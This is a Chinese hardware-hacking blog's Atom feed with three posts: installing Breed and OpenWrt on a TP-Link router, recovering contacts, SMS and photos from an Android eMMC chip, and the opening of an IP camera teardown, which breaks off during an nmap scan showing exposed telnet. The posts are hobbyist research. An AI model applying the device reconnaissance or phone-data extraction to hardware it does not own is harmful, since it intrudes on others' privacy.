-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathatom.xml
481 lines (285 loc) · 363 KB
/
atom.xml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
<?xml version="1.0" encoding="utf-8"?>
<feed xmlns="http://www.w3.org/2005/Atom">
<title>IterNull Blog</title>
<subtitle>万物即联网,万物皆可黑;</subtitle>
<link href="/atom.xml" rel="self"/>
<link href="https://blog.iternull.com/"/>
<updated>2018-12-28T15:39:31.261Z</updated>
<id>https://blog.iternull.com/</id>
<author>
<name>IterNull</name>
</author>
<generator uri="http://hexo.io/">Hexo</generator>
<entry>
<title>TP-Link TL-MR10U Install Breed Bootloader + OpenWrt</title>
<link href="https://blog.iternull.com/posts/2018/12/26/TP-Link-TL-MR10U-Install-Breed-Bootloader-and-OpenWrt.html"/>
<id>https://blog.iternull.com/posts/2018/12/26/TP-Link-TL-MR10U-Install-Breed-Bootloader-and-OpenWrt.html</id>
<published>2018-12-26T15:14:20.000Z</published>
<updated>2018-12-28T15:39:31.261Z</updated>
<content type="html"><![CDATA[<p>淘了一个二手的 TL-MR10U 自己升级一下硬件,装个 OpenWrt 再配上 LAN-Tap 作为可随身携带的便捷抓包工具使用。<br>还是自带电源的,不然拖个充电宝太麻烦了,OpenWrt 官网上也有一个 <a href="https://openwrt.org/toh/views/toh_battery-powered" target="_blank" rel="noopener">Table of Hardware: Battery powered</a> 页面列出了所有官方支持的可刷 OpenWrt 的“充电宝”。<br><a id="more"></a><br><img src="//files.iternull.com/images/2018-12-26_01-0001.jpg" alt=""></p><h2 id="升级硬件"><a href="#升级硬件" class="headerlink" title="升级硬件"></a>升级硬件</h2><p>你需要购买 64MB RAM 芯片 (HY5DU121622DTP-D43) 16MB FLASH 芯片 (W25Q128);准备热风枪拆焊台、电烙铁、助焊剂、镊子等工具;以及一个 CH341A 编程器外加宽体 SOP8 烧录座。<br>具体怎么操作可以网上找视频看看。记得别用电烙铁抵着吸锡带去拖内存焊盘上剩余的高温锡,你绝对把焊盘给弄脱落的。其实只给旁边的原件区域贴上高温胶带,在焊盘上加点助焊剂再用热风枪把新元件吹焊上去即可。<br>拆前最好先拍照,好记得原件的第一 Pin 是哪个位置,以免之后焊错方向。</p><h2 id="备份原始固件"><a href="#备份原始固件" class="headerlink" title="备份原始固件"></a>备份原始固件</h2><p>把拆下的 FLASH 用编程器读出所有数据并保存到备份文件里,再把读取的数据写入到新的 64MB FLASH 芯片里,最后再把新 FLASH 焊回主板上。</p><h2 id="刷入-Breed-Bootloader"><a href="#刷入-Breed-Bootloader" class="headerlink" title="刷入 Breed Bootloader"></a>刷入 Breed Bootloader</h2><p>下载未锁分区的 <a href="https://pan.baidu.com/s/1OCUnvfjJHJar7Pk0Lgt_uQ" target="_blank" rel="noopener">openwr-ar71xx-generic-tl-mr10u-v1-squashfs-factory.bin</a> 固件,用于刷入 U-Boot。<br>下载完成后直接在 TP-Link 官方的 Web 控制台里上传固件进行升级,TL-MR10U 插上网线与电脑相联,等待数分钟让路由器完成重启。</p><p>使用 git-bash 附带的 <code>scp</code> 工具上传 Breed Bootloader 到 TL-MR10U 的 <code>/tmp</code> 目录里。</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">scp breed-ar9331-mr12u-r1163.bin [email protected]:/tmp/</span><br></pre></td></tr></table></figure><p>通过 SSH 登录 TL-MR10U </p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ssh [email protected]</span><br></pre></td></tr></table></figure><p>备份 U-Boot & ART</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">cat /proc/mtd</span><br><span class="line">dd <span class="keyword">if</span>=/dev/mtd0 of=/tmp/u-boot.bin</span><br><span class="line">dd <span class="keyword">if</span>=/dev/mtd4 of=/tmp/art.bin</span><br><span class="line">scp [email protected]:/tmp/*.bin . <span class="comment"># 在你的电脑终端上执行,从远端复制到电脑上</span></span><br></pre></td></tr></table></figure><p>刷入新的 <a href="https://breed.hackpascal.net/EOL/breed-ar9331-mr12u-r1163.bin" target="_blank" rel="noopener">Breed Bootloader</a></p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">mtd -r write breed-ar9331-mr12u-r1163.bin u-boot</span><br></pre></td></tr></table></figure><p>如果出现 Could not open mtd device: u-boot Can’t open device for writing! 意味着你使用了 OpenWrt 官方正式版固件,默认是锁了 U-Boot 的,需要使用未锁分区才行。未锁分区的固件需要自己改 OpenWrt 源代码配置再重新编译或者下载他人编译好的。</p><h2 id="还原-Atheros-ART"><a href="#还原-Atheros-ART" class="headerlink" title="还原 Atheros ART"></a>还原 Atheros ART</h2><ul><li>注:如果你更换了 FLASH 芯片,不还原 Atheros ART 数据会导致你路由器无法使用 WiFi 功能!</li></ul><p>ART 数据里存储着 WiFi 功能的配置和驱动,如果损坏或丢失 ART 都会导致你安装后的 OpenWrt 没有无线功能。<br>按住 RESET 键后打开电源,持续按住 5 秒左右就可进入 Breed 的恢复模式。确保路由器使用网线连接到了电脑后,在浏览器里输入 <code>192.168.1.1</code> 进入 Breed Web 恢复控制台。<br>在【固件更新】选项里选择【编程器固件】取消勾选保留 ART 只勾选保留 Bootloader ,上传之前使用编程器备份的 FLASH dump 文件。<br>也可直接使用之前备份的 ART 直接还原。</p><p><img src="//files.iternull.com/images/2018-12-26_01-0002.png" alt=""></p><h2 id="安装-OpenWrt"><a href="#安装-OpenWrt" class="headerlink" title="安装 OpenWrt"></a>安装 OpenWrt</h2><p>恢复完成并重启后,再次手动进入 Breed 恢复模式。在【固件更新】选项里选择【常规固件】只勾选固件并上传最新的 OpenWrt factory 固件,与此同时也可备份 ART 以便后续再次用到。固件可在 TL-MR10U 的 OpenWrt 官网页面下载。</p><p><img src="//files.iternull.com/images/2018-12-26_01-0003.png" alt=""></p><p>如果是使用命令行安装,命令如下:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">scp lede-17.01.6-ar71xx-generic-tl-mr10u-v1-squashfs-factory.bin [email protected]:/tmp/</span><br><span class="line">ssh root192.168.1.1</span><br><span class="line">mtd -r write lede-17.01.6-ar71xx-generic-tl-mr10u-v1-squashfs-factory.bin firmware</span><br></pre></td></tr></table></figure><p>OpenWrt TP-Link TL-MR10U: <a href="https://openwrt.org/toh/tp-link/tl-mr10u" target="_blank" rel="noopener">https://openwrt.org/toh/tp-link/tl-mr10u</a><br>Firmware OpenWrt Install: <a href="http://downloads.openwrt.org/releases/17.01.6/targets/ar71xx/generic/lede-17.01.6-ar71xx-generic-tl-mr10u-v1-squashfs-factory.bin" target="_blank" rel="noopener">lede-17.01.6-ar71xx-generic-tl-mr10u-v1-squashfs-factory.bin</a><br>Firmware OpenWrt Upgrade: <a href="http://downloads.openwrt.org/releases/17.01.6/targets/ar71xx/generic/lede-17.01.6-ar71xx-generic-tl-mr10u-v1-squashfs-sysupgrade.bin" target="_blank" rel="noopener">lede-17.01.6-ar71xx-generic-tl-mr10u-v1-squashfs-sysupgrade.bin</a></p><h2 id="配置-OpenWrt"><a href="#配置-OpenWrt" class="headerlink" title="配置 OpenWrt"></a>配置 OpenWrt</h2><p>安装完成后首先在 Web 控制台里配置密码;配置子网网段以防发生冲突;配置无线功能;配置互联网访问功能,可选择使用网线连接互联网或使用无线连接到另一个可访问互联网的 WiFi AP。<br>如果你想在非本路由所在网段访问该路由器的 SSH 和 Web 控制台的话记得在密码设置页面勾选上允许从远端主机访问已经在防火墙里添加开放允许 <code>22</code> 和 <code>80</code> 端口访问。</p><p>更新软件包</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">opkg update</span><br><span class="line">opkg list-upgradable | cut -f 1 -d <span class="string">' '</span> | xargs opkg upgrade</span><br></pre></td></tr></table></figure><p>让 OpenWrt 支持挂载 U盘</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">opkg install usbutils</span><br><span class="line">opkg install block-mount e2fsprogs kmod-usb-storage kmod-usb-storage-extras kmod-usb2 kmod-usb3 kmod-fs-ext4 kmod-fs-vfat</span><br><span class="line">opkg install kmod-nls-cp437 kmod-nls-iso8859-1 kmod-nls-utf8</span><br><span class="line">mkdir /mnt/sda1</span><br><span class="line">block detect > /etc/config/fstab </span><br><span class="line">uci <span class="built_in">set</span> fstab.@mount[0].enabled=<span class="string">'1'</span></span><br><span class="line">uci commit</span><br><span class="line">uci <span class="built_in">set</span> fstab.@global[0].check_fs=<span class="string">'1'</span></span><br><span class="line">uci commit</span><br><span class="line">block mount</span><br><span class="line">service fstab <span class="built_in">enable</span></span><br></pre></td></tr></table></figure><p>安装常用工具</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">opkg install tcpdump htop lsof</span><br></pre></td></tr></table></figure><h2 id="Link"><a href="#Link" class="headerlink" title="Link"></a>Link</h2><ul><li><a href="https://oldwiki.archive.openwrt.org/doc/howto/generic.flashing" target="_blank" rel="noopener">Installing OpenWrt [Old OpenWrt Wiki]</a></li><li><a href="https://openwrt.org/docs/guide-user/installation/restore_art_partition" target="_blank" rel="noopener">OpenWrt Project: How to restore ART partition</a></li><li><a href="https://openwrt.org/docs/guide-developer/quickstart-build-images" target="_blank" rel="noopener">OpenWrt Project: Quick Image Building Guide</a></li><li><a href="https://www.cnblogs.com/11hwu2/articles/3702313.html" target="_blank" rel="noopener">Openwrt中的Art区域</a></li></ul>]]></content>
<summary type="html">
<p>淘了一个二手的 TL-MR10U 自己升级一下硬件,装个 OpenWrt 再配上 LAN-Tap 作为可随身携带的便捷抓包工具使用。<br>还是自带电源的,不然拖个充电宝太麻烦了,OpenWrt 官网上也有一个 <a href="https://openwrt.org/toh/views/toh_battery-powered" target="_blank" rel="noopener">Table of Hardware: Battery powered</a> 页面列出了所有官方支持的可刷 OpenWrt 的“充电宝”。<br>
</summary>
<category term="OpenWrt" scheme="https://blog.iternull.com/tags/OpenWrt/"/>
<category term="Breed Bootloader" scheme="https://blog.iternull.com/tags/Breed-Bootloader/"/>
<category term="TL-MR10U" scheme="https://blog.iternull.com/tags/TL-MR10U/"/>
</entry>
<entry>
<title>Android eMMC Data Recovery</title>
<link href="https://blog.iternull.com/posts/2018/12/19/Android-eMMC-Data-Recovery.html"/>
<id>https://blog.iternull.com/posts/2018/12/19/Android-eMMC-Data-Recovery.html</id>
<published>2018-12-19T10:32:41.000Z</published>
<updated>2018-12-21T07:38:23.356Z</updated>
<content type="html"><![CDATA[<p>最近升级了硬件工作台的工具,可以完成 BGA 的拆焊的工作了。把家里几年前进水的一只安卓手机,拿出来恢复一下里面的数据。<br>其实就是取下手机主板上的 eMMC 芯片再焊接到空的 U盘主控 PCB 板子上,读取里面的数据。这个方法只适合未全盘加密的设备使用,对于 iPhone 和全盘加密的 Android 只能修复主板或者拆下 ROM, CPU, Baseband 芯片,再焊接到完好的同型号主板上开机输入密码才能查看数据了。<br><a id="more"></a><br><img src="//files.iternull.com/images/2018-12-19_01-0001.png" alt=""></p><h2 id="硬件拆焊"><a href="#硬件拆焊" class="headerlink" title="硬件拆焊"></a>硬件拆焊</h2><p>这里我使用的是安国的 U盘主控 PCB 板子,具体买的时候根据手机 eMMC 芯片型号查询对应的 BGA 封装的类型选择对应的 U盘主控板。当然也可以使用 eMMC 转 SD 卡座,或者使用 SD 卡套直接焊接飞线来连接。</p><h2 id="读取-eMMC"><a href="#读取-eMMC" class="headerlink" title="读取 eMMC"></a>读取 eMMC</h2><p>我这里使用的是把 eMMC 焊接到 U盘主控板上来读取数据的方法。</p><h4 id="备份数据"><a href="#备份数据" class="headerlink" title="备份数据"></a>备份数据</h4><p>首先对焊接完成的 USB 设备进行数据的镜像备份,恢复数据是操作镜像文件,避免直接操作设备而损坏数据。<br>备份前为了确保 BGA 焊接是好的,需要看一下系统能否识别设备的分区表,Windows 系统直接在「磁盘管理」里查看,Linux 使用命令 <code>fdisk -l</code> 查看。<br>设备镜像备份工具在 Windows 上可使用 <a href="https://sourceforge.net/projects/win32diskimager/" target="_blank" rel="noopener">Win32 Disk Imager</a> 或 git-bash 里的 <code>dd</code> 命令备份,Linux 上也是使用 <code>dd</code> 命令备份。</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">dd <span class="keyword">if</span>=/dev/sda of=dump_0.img bs=1024</span><br></pre></td></tr></table></figure><h4 id="查看镜像文件的分区表"><a href="#查看镜像文件的分区表" class="headerlink" title="查看镜像文件的分区表"></a>查看镜像文件的分区表</h4><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">$ fdisk -l dump_0.img</span><br><span class="line">Ignoring extra data <span class="keyword">in</span> partition table 5.</span><br><span class="line">Ignoring extra data <span class="keyword">in</span> partition table 5.</span><br><span class="line">Disk dump_0.img: 3.6 GiB, 3875536896 bytes, 7569408 sectors</span><br><span class="line">Units: sectors of 1 * 512 = 512 bytes</span><br><span class="line">Sector size (logical/physical): 512 bytes / 512 bytes</span><br><span class="line">I/O size (minimum/optimal): 512 bytes / 512 bytes</span><br><span class="line">Disklabel <span class="built_in">type</span>: dos</span><br><span class="line">Disk identifier: 0xa91b46f7</span><br><span class="line"></span><br><span class="line">Device Boot Start End Sectors Size Id Type</span><br><span class="line">dump_0.img1 1024 4294968318 4294967295 2T 5 Extended</span><br><span class="line">dump_0.img2 26624 47103 20480 10M 83 Linux</span><br><span class="line">dump_0.img3 47104 67583 20480 10M 83 Linux</span><br><span class="line">dump_0.img4 101376 113663 12288 6M 83 Linux</span><br><span class="line">dump_0.img5 144384 1981439 1837056 897M 83 Linux</span><br><span class="line">dump_0.img6 4336640 4294968318 4290631679 2T 83 Linux</span><br></pre></td></tr></table></figure><h4 id="计算要挂载分区的位置"><a href="#计算要挂载分区的位置" class="headerlink" title="计算要挂载分区的位置"></a>计算要挂载分区的位置</h4><p>更具需要挂载分区的 Start 值乘以 Units 值得出挂载值</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">$ <span class="built_in">echo</span> $((4336640*512))</span><br><span class="line">2220359680</span><br></pre></td></tr></table></figure><h4 id="创建挂载目录"><a href="#创建挂载目录" class="headerlink" title="创建挂载目录"></a>创建挂载目录</h4><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">mkdir /mnt/emmc</span><br></pre></td></tr></table></figure><h4 id="挂载指定分区"><a href="#挂载指定分区" class="headerlink" title="挂载指定分区"></a>挂载指定分区</h4><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">mount -o loop,offset=2220359680 dump_0.img /mnt/emmc/</span><br></pre></td></tr></table></figure><h4 id="打包备份分区内的文件"><a href="#打包备份分区内的文件" class="headerlink" title="打包备份分区内的文件"></a>打包备份分区内的文件</h4><p>打包所有数据后可以复制到 Windows 上去解包查看具体的文件</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">tar cvzf ~/dump_0_img6.tar.gz /mnt/emmc/</span><br></pre></td></tr></table></figure><h2 id="照片恢复"><a href="#照片恢复" class="headerlink" title="照片恢复"></a>照片恢复</h2><p>正常来说之前存储的照片如果没手动删除,那肯定是还在 DCIM 目录里的。但不幸的是我并没有在 DCIM 目录找到拍摄的照片,不过倒是存在一个 .thumbnails 文件夹。<br>.thumbnails 文件夹里有些缩略图和 .thumbdata5 的缓存文件。</p><h4 id="从-thumbdata-恢复照片"><a href="#从-thumbdata-恢复照片" class="headerlink" title="从 .thumbdata 恢复照片"></a>从 <code>.thumbdata</code> 恢复照片</h4><p>这里使用 Python 脚本对 .thumbdata 文件的内照片进行读取并保存,另外你也可以使用 <a href="https://x0a.github.io/thumbdata3-viewer/" target="_blank" rel="noopener">HTML5 Thumbdata3 Viewer</a> 这个 Web 版的程序来读取。<a href="https://files.iternull.com/script/python/thumbdata.py" target="_blank" rel="noopener">thumbdata.py</a> 是我更改后的脚本,原始版本来自 <a href="https://android.stackexchange.com/questions/58087/read-content-of-thumbdata-file" target="_blank" rel="noopener">Stack Exchange</a> 。</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">$ <span class="built_in">cd</span> /mnt/emmc/</span><br><span class="line">$ find ./ -name *thumbdata*</span><br><span class="line">./DCIM/.thumbnails/.thumbdata5-1763508120_0</span><br><span class="line">$ mkdir ~/thumbnails</span><br><span class="line">$ cp DCIM/.thumbnails/.thumbdata5-1763508120_0 ~/thumbnails/</span><br><span class="line">$ <span class="built_in">cd</span> ~/thumbnails/</span><br><span class="line">$ wget https://files.iternull.com/script/python/thumbdata.py</span><br><span class="line">$ chmod 755 thumbdata.py</span><br><span class="line">$ ./thumbdata.py .thumbdata5-1763508120_0</span><br></pre></td></tr></table></figure><h2 id="联系人恢复"><a href="#联系人恢复" class="headerlink" title="联系人恢复"></a>联系人恢复</h2><p>联系人保存在 <code>data/data/com.android.providers.contacts/databases/</code> 目录下的 <code>contacts2.db</code> 数据库文件中的 <code>contacts</code>, <code>view_contacts</code> 表里。<br>通话记录保存在 <code>data/data/com.android.providers.contacts/databases/</code> 目录下的 <code>calllog.db</code> 数据库文件中的 <code>calls</code> 表里。<br>使用 <a href="https://sqlitebrowser.org/" target="_blank" rel="noopener">DB Browser for SQLite</a> 打开数据库文件即可读取出原始数据。</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">$ <span class="built_in">cd</span> /mnt/emmc/</span><br><span class="line">$ find ./ -name contacts2.db</span><br><span class="line">./data/data/com.android.providers.contacts/databases/contacts2.db</span><br><span class="line">$ find ./ -name calllog.db</span><br><span class="line">./data/data/com.android.providers.contacts/databases/calllog.db</span><br></pre></td></tr></table></figure><h2 id="短信恢复"><a href="#短信恢复" class="headerlink" title="短信恢复"></a>短信恢复</h2><p>短信保存在 <code>data/data/com.android.providers.telephony/databases/</code> 目录下的 <code>mmssms.db</code> 数据库文件中的 <code>sms</code> 表里。<br>使用 <a href="https://sqlitebrowser.org/" target="_blank" rel="noopener">DB Browser for SQLite</a> 打开数据库文件即可读取出原始数据。</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">$ <span class="built_in">cd</span> /mnt/emmc/</span><br><span class="line">$ find ./ -name mmssms.db</span><br><span class="line">./data/data/com.android.providers.telephony/databases/mmssms.db</span><br></pre></td></tr></table></figure>]]></content>
<summary type="html">
<p>最近升级了硬件工作台的工具,可以完成 BGA 的拆焊的工作了。把家里几年前进水的一只安卓手机,拿出来恢复一下里面的数据。<br>其实就是取下手机主板上的 eMMC 芯片再焊接到空的 U盘主控 PCB 板子上,读取里面的数据。这个方法只适合未全盘加密的设备使用,对于 iPhone 和全盘加密的 Android 只能修复主板或者拆下 ROM, CPU, Baseband 芯片,再焊接到完好的同型号主板上开机输入密码才能查看数据了。<br>
</summary>
<category term="Android" scheme="https://blog.iternull.com/tags/Android/"/>
<category term="eMMC" scheme="https://blog.iternull.com/tags/eMMC/"/>
<category term="Data Recovery" scheme="https://blog.iternull.com/tags/Data-Recovery/"/>
</entry>
<entry>
<title>Hacking IP Camera (和慧眼-C08)</title>
<link href="https://blog.iternull.com/posts/2017/12/26/Hacking-IP-Camera-Hehuiyan-C08.html"/>
<id>https://blog.iternull.com/posts/2017/12/26/Hacking-IP-Camera-Hehuiyan-C08.html</id>
<published>2017-12-25T18:12:27.000Z</published>
<updated>2018-05-31T09:43:30.280Z</updated>
<content type="html"><![CDATA[<p><a href="http://www.hehuiyan.com/" target="_blank" rel="noopener">和慧眼</a>是中国移动推出的一个摄像网络监控服务平台,旗下有多款智能摄像头设备。这里我们研究使用的是 C08 型号的。<br>IPCamera 与 WebCam 的其中一个区别是 IPCamera 不带有 Web 控制台,你只能使用厂商提供的 APP 控制设备,无法在局域网内通过网页控制设备。<br>并且 IPCamera 基本上都要连接互联网使用厂商的云平台,这意味着你的数据都会传输到云端,还可能需要再付费租用它的云端平台功能使用权。<br><a id="more"></a></p><h2 id="1-拆解硬件"><a href="#1-拆解硬件" class="headerlink" title="1 拆解硬件"></a>1 拆解硬件</h2><p><img src="//files.iternull.com/images/2017-12-26_01-0001.jpg" alt=""><br><img src="//files.iternull.com/images/2017-12-26_01-0002.jpg" alt=""></p><h2 id="2-串口调试"><a href="#2-串口调试" class="headerlink" title="2 串口调试"></a>2 串口调试</h2><p>我们这里使用 CP2012 USB to TTL 工具连接到设备上焊接了跳线的 UART 接口</p><p><img src="//files.iternull.com/images/2017-12-26_01-0003.jpg" alt=""></p><p>使用 PuTTY 客户端连接 COM 端口开始上电调试</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br></pre></td><td class="code"><pre><span class="line">U-Boot 2010.06-svn2464 (Jan 21 2015 - 09:06:53)</span><br><span class="line">DRAM: 256 MiB</span><br><span class="line">gBootLogPtr:80b80008.</span><br><span class="line">Check spi flash controller v350... Found</span><br><span class="line">Spi(cs1) ID: 0xEF 0x40 0x18 0x00 0x00 0x00</span><br><span class="line">reset/hold pin now is RESET</span><br><span class="line">Spi(cs1): Block:64KB Chip:16MB Name:<span class="string">"W25Q128B"</span></span><br><span class="line">boot from spi</span><br><span class="line">boot from spi</span><br><span class="line">partition file version 2</span><br><span class="line">rootfstype squashfs root /dev/mtdblock4</span><br><span class="line">In: serial</span><br><span class="line">Out: serial</span><br><span class="line">Err: serial</span><br><span class="line">TEXT_BASE:81000000</span><br><span class="line">state:ff,err_count:00</span><br><span class="line">support SD update</span><br><span class="line">MMC: Card did not respond to voltage select!</span><br><span class="line">No EMMC device found!!!</span><br><span class="line">Hisilicon ETH net controler</span><br><span class="line">No such device: 0:1</span><br><span class="line">No such device: 0:1</span><br><span class="line">No such device: 0:2</span><br><span class="line">No such device: 0:2</span><br><span class="line">Try again use backup_serverip</span><br><span class="line">Hisilicon ETH net controler</span><br><span class="line">No such device: 0:1</span><br><span class="line">No such device: 0:1</span><br><span class="line">No such device: 0:2</span><br><span class="line">No such device: 0:2</span><br><span class="line">Failed to get info.txt</span><br><span class="line">Fail to get info file!</span><br><span class="line">Init error!</span><br><span class="line">Hisilicon ETH net controler</span><br><span class="line">No such device: 0:1</span><br><span class="line">No such device: 0:1</span><br><span class="line">No such device: 0:2</span><br><span class="line">No such device: 0:2</span><br><span class="line"><span class="comment">## Booting kernel from Legacy Image at 82000000 ...</span></span><br><span class="line"> Image Name: Linux-3.0.8</span><br><span class="line"> Image Type: ARM Linux Kernel Image (uncompressed)</span><br><span class="line"> Data Size: 1042164 Bytes = 1017.7 KiB</span><br><span class="line"> Load Address: 80008000</span><br><span class="line"> Entry Point: 80008000</span><br><span class="line"> Loading Kernel Image ...OK</span><br><span class="line">OK</span><br><span class="line">boot from spi</span><br><span class="line">partition file version 2</span><br><span class="line">rootfstype squashfs root /dev/mtdblock4</span><br><span class="line">cmdLine mem=44M console=ttyS0,115200 root=/dev/mtdblock4 rootfstype=squashfs</span><br><span class="line"></span><br><span class="line">Starting kernel ...</span><br><span class="line">Uncompressing Linux... <span class="keyword">done</span>, booting the kernel.</span><br></pre></td></tr></table></figure><p>尝试了多次,调试信息都是一直卡在 booting the kernel. 这,没弹出 Shell ,也没弹出登陆认证的请求。尝使用串口登陆 Shell 只能暂时放弃。</p><h2 id="3-网络调试"><a href="#3-网络调试" class="headerlink" title="3 网络调试"></a>3 网络调试</h2><h3 id="3-1-端口扫描"><a href="#3-1-端口扫描" class="headerlink" title="3.1 端口扫描"></a>3.1 端口扫描</h3><p>使用 Nmap 扫描设备开放端口</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span class="line">$ nmap -A 192.168.8.236</span><br><span class="line">Nmap scan report <span class="keyword">for</span> 192.168.8.236</span><br><span class="line">Host is up (0.0080s latency).</span><br><span class="line">Not shown: 997 closed ports</span><br><span class="line">PORT STATE SERVICE VERSION</span><br><span class="line">23/tcp open telnet security DVR telnetd (many brands)</span><br><span class="line">554/tcp open rtsp</span><br><span class="line">| fingerprint-strings:</span><br><span class="line">| SIPOptions:</span><br><span class="line">| RTSP/1.0 401 Unauthorized</span><br><span class="line">| CSeq: 42</span><br><span class="line">|_ WWW-Authenticate: Basic realm=<span class="string">"MediaServer3.0"</span></span><br><span class="line">|_rtsp-methods: ERROR: Script execution failed (use -d to debug)</span><br><span class="line">5000/tcp open upnp?</span><br><span class="line">1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at 